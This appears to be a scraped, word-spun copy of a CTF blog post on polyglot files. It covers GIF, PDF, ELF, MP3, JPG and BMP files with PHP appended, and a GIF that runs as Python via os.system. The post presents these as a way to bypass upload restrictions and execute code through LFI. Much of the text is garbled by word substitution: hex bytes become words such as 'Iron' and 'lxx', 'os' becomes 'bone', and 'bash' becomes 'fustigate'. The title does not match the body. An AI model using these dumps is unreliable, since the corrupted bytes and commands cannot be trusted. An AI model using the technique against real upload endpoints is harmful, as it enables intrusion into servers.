Php Script Backup Files and Upload Aws

Vi files that are also a valid PHP

Half-dozen files that are likewise a valid PHP and a Haskell GIF that is also a Python-Python-Python. The challenge was inspired past the PoC||GTFO Journal's idea of a polyglot file. The thought of having one file that has ii formats was interesting and somewhat useful to bypass upload restrictions and execute the unexpected blazon of your file with some LFI. I've found a repository with a huge listing with the "Smallest possible's possible" list.

And a GIF that is also a Python

That history begins with me trying to make a GIF that is likewise a valid Haskell, all that for a CTF claiming. Although was a hurting in the ass to kill this claiming, the idea of having ane file that has 2 format was actually interesting and somewhat useful to bypass upload restrictions and execute the unexpected type of your file with some LFI.

GIF + PHP

I was reading the PoC||GTFO Journal and they love the thought of a polyglot file, one of their bug is a PDF/Naught and NES ROM , so I started with the simplest — and probably the only one that is useful — file format : PHP. Why is the simplest? Because you tin can state where the code starts with <? and where it ends with ?> , with that I tin put the PHP code anywhere in the file.

I already knew something most GIF, so let's start with it. Having in mind that the content of the GIF is worthless to us the tiniest GIF possible is a great place to start :

              HEX   : 47 49 46 38 39 61 01 00 01 00 00 FF 00 2C 00 00 00 00 01 00 01 00 00 02 00 3B            

              ASCII : GIF89a���ÿ�,��������;            

As explained in the web log post, that makes a 1x1 black gif and information technology should suspension because it doesn't accept the Global Colour Table, just it works because the readers does not follow the specification at risk. Now I want to put my PHP string somewhere in at that place. Reading the GIF89a Specification I've found the Comment Extension which let u.s.a. to put a comment in the GIF at the end of the file. Something like that :

                              7 6 v four iii ii 1 0        Field Name                    Type      +---------------+   0  |      0x21     |       Extension Introducer          Byte      +---------------+   ane  |      0xFE     |       Annotate Characterization                 Byte      +---------------+       +===============+      |    <?         |   North  |    phpinfo(); |       Comment Data            Information Sub-blocks      |               |      +===============+       +---------------+   0  |       ;       |       Cake Terminator              Byte      +---------------+            

So now we tin append our PHP code every bit a annotate in the GIF :

              HEX   : 47 49 46 38 39 61 01 00 01 00 00 FF 00 2C 00 00 00 00 01 00 01 00 00 02 00 21 Iron 3C 3F 70 68 70 69 6E 66 6F 28 29 3B ASCII : GIF89a���ÿ�,��������!þ<?phpinfo();            

Notation that !þ = 0x21 0xFE , and PHP doesn't crave the ?> at the end. Too GIF makes easy for us having the EOF equally a semicolon.

PHP + PDF

Following the steps of PoC||GTFO let'due south play with PDF. The plan still the same, get the simplest PDF possible and try to append a annotate.

I had a problem with the first part of the plan, I apply OS Ten and his PDF reader is restrict as fuck, almost every simple PDF that I've found in the net has some error for the OS X's reader. The simply one that is all in ASCII and worked for me was this 1: https://stackoverflow.com/a/32142316

              %PDF-ane.2  9 0 obj << >> stream BT/ 9 Tf(Test)' ET endstream endobj 4 0 obj << /Type /Folio /Parent 5 0 R /Contents 9 0 R >> endobj 5 0 obj << /Kids [four 0 R ] /Count 1 /Blazon /Pages /MediaBox [ 0 0 99 9 ] >> endobj 3 0 obj << /Pages 5 0 R /Type /Catalog >> endobj trailer << /Root 3 0 R >> %%EOF            

It has a lot of parts that isn't required for other readers, like the Chrome's reader, and it should be really smaller simply it doesn't matter. PDF is much simpler, like any program language it has a lawmaking for comments which is % , so merely put that subsequently any line and suspend the PHP code .

              %PDF-1.2 %<?phpinfo()?> ...            

Simplest approach

Surfing in the Spider web I've found something really beautiful , a repository with a huge list with the "Smallest possible […] file", and so I started to endeavor append PHP to some of that files.

As it turns out, most of the files has a EOF of some kind to state that the file has ended, and virtually readers just ignores anything that is put after that EOF. Hither is 4 examples :

ELF + PHP

              HEX   : 7F 45 4C 46 01 01 01 00 00 00 00 00 00 00 00 00 02 00 03 00 01 00 00 00 19 40 CD lxxx 2C 00 00 00 00 00 00 00 00 00 00 00 34 00 20 00 01 00 00 00 00 00 00 00 00 40 CD eighty 00 xl CD 80 4C 00 00 00 4C 00 00 00 05 00 00 00 00 10 00 00 3C 3F 70 68 70 69 6E 66 6F 28 29 3B 3F 3E ASCII : ELF��������������@̀,�����������iv� ���������@̀�@̀50���Fifty���������<?phpinfo();?>            

MP3 + PHP

              HEX   : FF E3 18 C4 00 00 00 03 48 00 00 00 00 4C 41 4D 45 33 2E 39 38 2E 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3C 3F lxx 68 70 69 6E 66 6F 28 29 3B 3F 3E ASCII : ÿãÄ���H����LAME3.98.2�������������������������������������������������<?phpinfo();?>            

JPG + PHP

              HEX   : FF D8 FF DB 00 43 00 03 02 02 02 02 02 03 02 02 02 03 03 03 03 04 06 04 04 04 04 04 08 06 06 05 06 09 08 0A 0A 09 08 09 09 0A 0C 0F 0C 0A 0B 0E 0B 09 09 0D eleven 0D 0E 0F ten x 11 10 0A 0C 12 xiii 12 ten xiii 0F 10 x x FF C9 00 0B 08 00 01 00 01 01 01 xi 00 FF CC 00 06 00 10 10 05 FF DA 00 08 01 01 00 00 3F 00 D2 CF 20 FF D9 3C 3F 70 68 seventy 69 6E 66 6F 28 29 3B 3F 3E ASCII : ÿØÿÛ�C�                          

                                        ÿÉ� ���ÿÌ��ÿÚ���?�ÒÏ ÿÙ<?phpinfo();?>            

Append PHP to JPEG is actually old, simply everyone just put in the EXIF, and I consider it cheating.

BMP + PHP

              HEX  : 42 4D 1E 00 00 00 00 00 00 00 1A 00 00 00 0C 00 00 00 01 00 01 00 01 00 eighteen 00 00 00 FF 00 3C 3F 70 68 lxx 69 6E 66 6F 28 29 3B 3F 3E ASCI : BM���������� ���������ÿ�<?phpinfo();?>            

Bonus round :

Afterward that finding I started playing with something more hardcore. A GIF that is also a valid Python. None of the above "techniques" works considering you lot can't just say to Python Interpreter where to first to run the code similar PHP. Allow's take some other look at another GIF :

              HEX   : 47 49 46 38 39 61 01 00 01 00 80 01 00 FF FF FF 00 00 00 21 F9 04 01 0A 00 01 00 2C 00 00 00 00 01 00 01 00 00 02 02 4C 01 00 3B ASCII : GIF89a��€�ÿÿÿ���!ù ��,�������L�;            

Allow'southward endeavour a fault based analysis, what is the fault that this file gives when run as a .py ?

              $ python tinytrans.gif   File "tinytrans.gif", line 1     GIF89a           ^ SyntaxError: invalid syntax            

Information technology throws a syntax error at the 0x01 byte, which is expected. The GIF Magic Number specifies that is a GIF and that his version is "89a", it turns out that every reader merely require that the version is 89 or 87 ignoring the "a" role, so we tin can supplant the "a" with a "=" and state that "GIF89" is a variable, that should be a squeamish commencement. Let's run again.

              $ python tinytrans.gif   File "tinytrans.gif", line one     GIF89=           ^ SyntaxError: invalid syntax            

Once more , as expected. The start idea that I have was to merely comment the gibberish function of the GIF and put a comment, just like at the PHP+GIF, that is a valid python and information technology was going to exist fine. Merely in the heart of the gibberish it has a 0x0a byte, which is also a new line, that bugs all my attempts. I was trying to make something similar this :

              GIF89=\ #[email protected][email protected]$!(@#@!_#)[email protected][electronic mail protected]!þ\ __import__('bone').system('ls');            

That is, a multi-line variable declaration using the '\' and in the eye of it just commenting the Non-ASCII, afterward that appending the '!þ' to start a GIF comment, jumping to another line and putting the actual code, post-obit by the EOF'south semicolon, which is also valid in Python.

But trying to make a comment in a multi-line variable declaration was just impossible, but making that inside a parentheses was valid : https://stackoverflow.com/a/22914853 . New try :

HEX :

              47 49 46 38 39 3D 28 0A 00 00 lxxx 01 00 FF FF FF 00 00 00 21 F9 04 01 00 00 01 00 2C 00 00 00 00 01 00 01 00 00 02 02 4C 01 00 21 Fe 0A 5F 5F 69 6D 70 6F 72 74 5F 5F 28 27 6F 73 27 29 2E 73 79 73 74 65 6D 28 27 6C 73 27 29 29 3B            

ASCII :

              GIF89=( ��€�ÿÿÿ���!ù���,�������L�!þ __import__('bone').arrangement('ls'));            

Annotation that the interpreter will merely ignore the line that starts with a Not-ASCII character, which is odd, so we don't need the # . And Running :

              $ python python.gif fustigate.gif  handtinyblack.gif php.elf   php.mp3   tinytrans.gif bmp.bmp   php-logo-virus.jpg php.gif   php.pdf   tinytrans.gpy dude.gif  php.bmp   php.jpg   python.gif  tinytrans.py            

Yay !

Tags

# python# programming# ctf# php# capture-the-flag

Related Stories

graybealprety1958.blogspot.com

Source: https://hackernoon.com/six-files-that-are-also-a-valid-php-540343ad35c8

Share this post